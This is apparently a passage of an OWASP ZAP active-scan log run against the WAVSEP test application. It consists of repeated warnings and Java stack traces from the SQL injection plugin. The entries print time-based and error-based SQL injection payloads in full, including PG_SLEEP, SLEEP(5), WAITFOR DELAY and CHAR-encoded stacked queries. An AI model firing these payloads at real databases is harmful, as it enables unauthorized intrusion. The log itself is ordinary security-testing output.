org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681279 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681279 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(5663=5663,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(5663=5663,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681280 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681281 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7871=7871) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7871=7871) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681282 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681282 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9482=9482) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9482=9482) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681284 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681284 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);(SELECT * FROM (SELECT(SLEEP(5)))nXhE)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);(SELECT * FROM (SELECT(SLEEP(5)))nXhE)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681285 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;(SELECT * FROM (SELECT(SLEEP(5)))tofU)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;(SELECT * FROM (SELECT(SLEEP(5)))tofU)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681285 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681286 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681287 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');(SELECT * FROM (SELECT(SLEEP(5)))eOtS)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');(SELECT * FROM (SELECT(SLEEP(5)))eOtS)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681288 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';(SELECT * FROM (SELECT(SLEEP(5)))xTEt)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';(SELECT * FROM (SELECT(SLEEP(5)))xTEt)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681288 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681289 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at 